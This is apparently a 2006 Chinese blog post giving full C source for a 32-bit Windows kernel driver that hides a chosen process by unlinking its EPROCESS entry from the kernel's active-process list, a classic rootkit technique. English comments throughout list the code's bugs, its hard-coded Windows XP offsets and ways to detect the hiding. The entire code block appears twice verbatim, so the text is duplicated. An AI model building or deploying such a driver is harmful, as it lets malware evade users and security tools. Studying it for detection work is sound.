一段进程隐藏的代码
2006-03-07 02:05
打开物理内存->找到活动进程链表->摘除自己
这个用去动作很简单:
#define DEBUGMSG
#include <ntddk.h>
/*
 * Process-hiding driver (DKOM, "Direct Kernel Object Manipulation").
 * Given a PID over an IOCTL it unlinks that process's EPROCESS from the
 * kernel's doubly linked active-process list, so code that enumerates
 * processes by walking that list no longer reports it. This is the classic
 * technique that rootkit scanners look for by cross-view comparison (list
 * walk vs. the PID/handle table or per-thread structures).
 */
#define DWORD ULONG   /* 32-bit; pointers are stored in DWORDs below, so this code is not 64-bit safe */
/* NT object paths use backslashes; the forward slashes here look like a rendering artifact of the page. */
#define NT_DEVICE_NAME L"//Device//king"
#define DOS_DEVICE_NAME L"//DosDevices//king"
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
DWORD FindProcessEPROC(int Terminate_PID);
/*
 * Hard-coded EPROCESS field offsets: UniqueProcessId and ActiveProcessLinks.
 * They appear to match the 32-bit Windows XP layout; they are never
 * validated, and on any other build every read/write below touches
 * arbitrary kernel memory. Hard-coded structure offsets like these are a
 * strong static indicator when triaging an unknown driver.
 */
int PIDOFFSET=0x84;
int FLINKOFFSET=0x88;
PDEVICE_OBJECT KingObject=NULL;   /* the control device; created without an explicit security descriptor (see DriverEntry) */
/*
 * Driver entry point: creates the control device and its DOS symbolic link
 * and installs the dispatch routines.
 * Returns STATUS_SUCCESS, or STATUS_NO_SUCH_DEVICE when device or link
 * creation fails.
 * Review notes (left as in the original):
 *  - No security descriptor is passed, so who may open the device is decided
 *    by the I/O manager's default DACL for FILE_DEVICE_UNKNOWN; nothing here
 *    restricts the hide IOCTL to privileged callers.
 *  - If IoCreateSymbolicLink fails, the device created just before it is not
 *    deleted (leak on the error path).
 *  - pString and RegistryPath are unused.
 *  - The "/n" in the DbgPrint strings is presumably a mangled "\n".
 */
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
PUNICODE_STRING pString;
UNICODE_STRING ntDeviceName;
UNICODE_STRING win32DeviceName;
NTSTATUS status;
RtlInitUnicodeString(&ntDeviceName,NT_DEVICE_NAME);
DbgPrint("Start/n");
if (!NT_SUCCESS(status = IoCreateDevice(DriverObject,0,&ntDeviceName,
FILE_DEVICE_UNKNOWN,0,FALSE,
&KingObject)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateDevice:%x/n",status);
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
if (!NT_SUCCESS(status = IoCreateSymbolicLink(&win32DeviceName,&ntDeviceName)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateSymbolicLink:%x/n",status);
/* CREATE/CLOSE simply succeed; all real work is behind IRP_MJ_DEVICE_CONTROL. */
DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverObject->MajorFunction[IRP_MJ_CLOSE]=DriverDispAtch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=myDriverIoControl;
DriverObject->DriverUnload=DriverUnloAd;
return STATUS_SUCCESS;
}
/*
 * IRP_MJ_DEVICE_CONTROL handler. IOCTL 800 takes a PID from the (buffered)
 * input buffer, locates its EPROCESS and unlinks it from the active-process
 * list. Any other code is rejected.
 * 800 is not built with CTL_CODE; its low two bits are 0, which decodes as
 * METHOD_BUFFERED, consistent with the SystemBuffer use below.
 * Review notes (defects, left as in the original):
 *  - InputBufferLength is never checked before *in_buffer is read; for an
 *    empty request SystemBuffer can be NULL, which faults in kernel mode.
 *  - out_size is read but never checked before *out_buffer is written.
 *  - On the non-800 path the IRP gets neither a status nor IoCompleteRequest,
 *    so the request hangs and the IRP leaks.
 *  - A PID that is not found still completes with STATUS_SUCCESS.
 *  - The list is modified without the synchronization the kernel itself
 *    uses for it.
 * Detection: the hidden process remains reachable through other kernel
 * views (its threads, the PID/handle table), so comparing the list walk
 * against another view exposes the gap; driver signing and kernel patch
 * protection on 64-bit Windows also raise the bar against this technique.
 */
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus=STATUS_SUCCESS;
PIO_STACK_LOCATION stack;
DWORD *in_buffer, *out_buffer;
ULONG code,out_size;
DWORD eproc=0;
PLIST_ENTRY plist_active_procs;
stack = IoGetCurrentIrpStackLocation(Irp);
out_size = stack->Parameters.DeviceIoControl.OutputBufferLength;
code = stack->Parameters.DeviceIoControl.IoControlCode;
in_buffer = out_buffer = Irp->AssociatedIrp.SystemBuffer;   /* METHOD_BUFFERED: one shared buffer for input and output */
if(code==800)
{
DWORD PID=*in_buffer;   /* length unchecked: see header note */
eproc=FindProcessEPROC(PID);
if(eproc==0)
{
Irp->IoStatus.Status = ntStatus;   /* not found, yet reported as success */
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
plist_active_procs=(LIST_ENTRY *)(eproc+FLINKOFFSET);   /* &EPROCESS->ActiveProcessLinks, per the hard-coded offset */
/*
 * Unlink: prev->Flink = next; next->Blink = prev. The "+1" on a DWORD*
 * steps over Flink to the neighbour's Blink field. The unlinked entry's
 * own Flink/Blink still point at its old neighbours, which is a known
 * source of kernel crashes when the kernel later removes the process
 * from the list itself.
 */
*((DWORD *)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink;
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
*out_buffer = 0;   /* written even when OutputBufferLength is 0 */
Irp->IoStatus.Information = 4;
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
return ntStatus;   /* IRP is never completed on this path */
}
/*
 * IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes every open and close with
 * STATUS_SUCCESS, so any caller allowed by the device's DACL gets a handle.
 * IoStatus.Information is not set here.
 */
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
/*
 * Driver unload: removes the DOS link and the control device.
 * It does not relink any process hidden earlier, so the list modification
 * outlives the driver; forensically, an unlinked process can persist with
 * no driver loaded.
 */
VOID DriverUnloAd (IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING win32DeviceName;
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);   /* must match the link created in DriverEntry */
IoDeleteSymbolicLink(&win32DeviceName);
IoDeleteDevice(KingObject);   /* non-NULL here: unload is only reachable after DriverEntry succeeded */
return;
}
/*
 * Walks the active-process list starting from the current process and
 * returns the EPROCESS address (as a DWORD) whose UniqueProcessId equals
 * terminate_PID, or 0 when the walk comes back round to the starting PID
 * without a match. PID 0 is rejected up front (returns 0).
 * Review notes (left as in the original):
 *  - Everything is read through hard-coded offsets (PIDOFFSET/FLINKOFFSET)
 *    from raw kernel addresses with no validation; on a different build the
 *    reads are garbage or fault.
 *  - The list head is a bare LIST_ENTRY, not embedded in an EPROCESS, so
 *    when the walk passes it "eproc" is a bogus base address and the PID
 *    read there is whatever precedes the head in memory, which could
 *    spuriously match terminate_PID.
 *  - No synchronization with process creation/exit during the walk.
 */
DWORD FindProcessEPROC(int terminate_PID)
{
DWORD eproc =0;
int current_PID=0;
int start_PID=0;
int i_count=0;
PLIST_ENTRY plist_active_procs;
if(terminate_PID==0) return terminate_PID;   /* PID 0 (System Idle) is never searched for */
eproc=(DWORD)PsGetCurrentProcess();   /* in this dispatch path: the IOCTL caller's own EPROCESS */
start_PID=*((DWORD*)(eproc+PIDOFFSET));
current_PID=start_PID;
while(1)
{
if(terminate_PID==current_PID) return eproc;
else if((i_count>=1)&&(start_PID==current_PID))   /* i_count guard lets the first iteration through */
{
return 0;   /* full circle without a match */
}
else
{
plist_active_procs=(LIST_ENTRY*)(eproc+FLINKOFFSET);
eproc=(DWORD)plist_active_procs->Flink;
eproc=eproc-FLINKOFFSET;   /* back from the LIST_ENTRY to the (presumed) EPROCESS base */
current_PID=*((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
这个用去动作很简单:
#define DEBUGMSG
#include <ntddk.h>
/*
 * Process-hiding driver (DKOM, "Direct Kernel Object Manipulation").
 * Given a PID over an IOCTL it unlinks that process's EPROCESS from the
 * kernel's doubly linked active-process list, so code that enumerates
 * processes by walking that list no longer reports it. This is the classic
 * technique that rootkit scanners look for by cross-view comparison (list
 * walk vs. the PID/handle table or per-thread structures).
 */
#define DWORD ULONG   /* 32-bit; pointers are stored in DWORDs below, so this code is not 64-bit safe */
/* NT object paths use backslashes; the forward slashes here look like a rendering artifact of the page. */
#define NT_DEVICE_NAME L"//Device//king"
#define DOS_DEVICE_NAME L"//DosDevices//king"
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);
DWORD FindProcessEPROC(int Terminate_PID);
/*
 * Hard-coded EPROCESS field offsets: UniqueProcessId and ActiveProcessLinks.
 * They appear to match the 32-bit Windows XP layout; they are never
 * validated, and on any other build every read/write below touches
 * arbitrary kernel memory. Hard-coded structure offsets like these are a
 * strong static indicator when triaging an unknown driver.
 */
int PIDOFFSET=0x84;
int FLINKOFFSET=0x88;
PDEVICE_OBJECT KingObject=NULL;   /* the control device; created without an explicit security descriptor (see DriverEntry) */
/*
 * Driver entry point: creates the control device and its DOS symbolic link
 * and installs the dispatch routines.
 * Returns STATUS_SUCCESS, or STATUS_NO_SUCH_DEVICE when device or link
 * creation fails.
 * Review notes (left as in the original):
 *  - No security descriptor is passed, so who may open the device is decided
 *    by the I/O manager's default DACL for FILE_DEVICE_UNKNOWN; nothing here
 *    restricts the hide IOCTL to privileged callers.
 *  - If IoCreateSymbolicLink fails, the device created just before it is not
 *    deleted (leak on the error path).
 *  - pString and RegistryPath are unused.
 *  - The "/n" in the DbgPrint strings is presumably a mangled "\n".
 */
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
PUNICODE_STRING pString;
UNICODE_STRING ntDeviceName;
UNICODE_STRING win32DeviceName;
NTSTATUS status;
RtlInitUnicodeString(&ntDeviceName,NT_DEVICE_NAME);
DbgPrint("Start/n");
if (!NT_SUCCESS(status = IoCreateDevice(DriverObject,0,&ntDeviceName,
FILE_DEVICE_UNKNOWN,0,FALSE,
&KingObject)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateDevice:%x/n",status);
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);
if (!NT_SUCCESS(status = IoCreateSymbolicLink(&win32DeviceName,&ntDeviceName)))
return STATUS_NO_SUCH_DEVICE;
DbgPrint("IoCreateSymbolicLink:%x/n",status);
/* CREATE/CLOSE simply succeed; all real work is behind IRP_MJ_DEVICE_CONTROL. */
DriverObject->MajorFunction[IRP_MJ_CREATE]=DriverObject->MajorFunction[IRP_MJ_CLOSE]=DriverDispAtch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=myDriverIoControl;
DriverObject->DriverUnload=DriverUnloAd;
return STATUS_SUCCESS;
}
/*
 * IRP_MJ_DEVICE_CONTROL handler. IOCTL 800 takes a PID from the (buffered)
 * input buffer, locates its EPROCESS and unlinks it from the active-process
 * list. Any other code is rejected.
 * 800 is not built with CTL_CODE; its low two bits are 0, which decodes as
 * METHOD_BUFFERED, consistent with the SystemBuffer use below.
 * Review notes (defects, left as in the original):
 *  - InputBufferLength is never checked before *in_buffer is read; for an
 *    empty request SystemBuffer can be NULL, which faults in kernel mode.
 *  - out_size is read but never checked before *out_buffer is written.
 *  - On the non-800 path the IRP gets neither a status nor IoCompleteRequest,
 *    so the request hangs and the IRP leaks.
 *  - A PID that is not found still completes with STATUS_SUCCESS.
 *  - The list is modified without the synchronization the kernel itself
 *    uses for it.
 * Detection: the hidden process remains reachable through other kernel
 * views (its threads, the PID/handle table), so comparing the list walk
 * against another view exposes the gap; driver signing and kernel patch
 * protection on 64-bit Windows also raise the bar against this technique.
 */
NTSTATUS myDriverIoControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
NTSTATUS ntStatus=STATUS_SUCCESS;
PIO_STACK_LOCATION stack;
DWORD *in_buffer, *out_buffer;
ULONG code,out_size;
DWORD eproc=0;
PLIST_ENTRY plist_active_procs;
stack = IoGetCurrentIrpStackLocation(Irp);
out_size = stack->Parameters.DeviceIoControl.OutputBufferLength;
code = stack->Parameters.DeviceIoControl.IoControlCode;
in_buffer = out_buffer = Irp->AssociatedIrp.SystemBuffer;   /* METHOD_BUFFERED: one shared buffer for input and output */
if(code==800)
{
DWORD PID=*in_buffer;   /* length unchecked: see header note */
eproc=FindProcessEPROC(PID);
if(eproc==0)
{
Irp->IoStatus.Status = ntStatus;   /* not found, yet reported as success */
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
plist_active_procs=(LIST_ENTRY *)(eproc+FLINKOFFSET);   /* &EPROCESS->ActiveProcessLinks, per the hard-coded offset */
/*
 * Unlink: prev->Flink = next; next->Blink = prev. The "+1" on a DWORD*
 * steps over Flink to the neighbour's Blink field. The unlinked entry's
 * own Flink/Blink still point at its old neighbours, which is a known
 * source of kernel crashes when the kernel later removes the process
 * from the list itself.
 */
*((DWORD *)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink;
Irp->IoStatus.Status = ntStatus;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return ntStatus;
}
*out_buffer = 0;   /* written even when OutputBufferLength is 0 */
Irp->IoStatus.Information = 4;
ntStatus = STATUS_INVALID_DEVICE_REQUEST;
return ntStatus;   /* IRP is never completed on this path */
}
/*
 * IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes every open and close with
 * STATUS_SUCCESS, so any caller allowed by the device's DACL gets a handle.
 * IoStatus.Information is not set here.
 */
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
/*
 * Driver unload: removes the DOS link and the control device.
 * It does not relink any process hidden earlier, so the list modification
 * outlives the driver; forensically, an unlinked process can persist with
 * no driver loaded.
 */
VOID DriverUnloAd (IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING win32DeviceName;
RtlInitUnicodeString(&win32DeviceName,DOS_DEVICE_NAME);   /* must match the link created in DriverEntry */
IoDeleteSymbolicLink(&win32DeviceName);
IoDeleteDevice(KingObject);   /* non-NULL here: unload is only reachable after DriverEntry succeeded */
return;
}
/*
 * Walks the active-process list starting from the current process and
 * returns the EPROCESS address (as a DWORD) whose UniqueProcessId equals
 * terminate_PID, or 0 when the walk comes back round to the starting PID
 * without a match. PID 0 is rejected up front (returns 0).
 * Review notes (left as in the original):
 *  - Everything is read through hard-coded offsets (PIDOFFSET/FLINKOFFSET)
 *    from raw kernel addresses with no validation; on a different build the
 *    reads are garbage or fault.
 *  - The list head is a bare LIST_ENTRY, not embedded in an EPROCESS, so
 *    when the walk passes it "eproc" is a bogus base address and the PID
 *    read there is whatever precedes the head in memory, which could
 *    spuriously match terminate_PID.
 *  - No synchronization with process creation/exit during the walk.
 */
DWORD FindProcessEPROC(int terminate_PID)
{
DWORD eproc =0;
int current_PID=0;
int start_PID=0;
int i_count=0;
PLIST_ENTRY plist_active_procs;
if(terminate_PID==0) return terminate_PID;   /* PID 0 (System Idle) is never searched for */
eproc=(DWORD)PsGetCurrentProcess();   /* in this dispatch path: the IOCTL caller's own EPROCESS */
start_PID=*((DWORD*)(eproc+PIDOFFSET));
current_PID=start_PID;
while(1)
{
if(terminate_PID==current_PID) return eproc;
else if((i_count>=1)&&(start_PID==current_PID))   /* i_count guard lets the first iteration through */
{
return 0;   /* full circle without a match */
}
else
{
plist_active_procs=(LIST_ENTRY*)(eproc+FLINKOFFSET);
eproc=(DWORD)plist_active_procs->Flink;
eproc=eproc-FLINKOFFSET;   /* back from the LIST_ENTRY to the (presumed) EPROCESS base */
current_PID=*((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}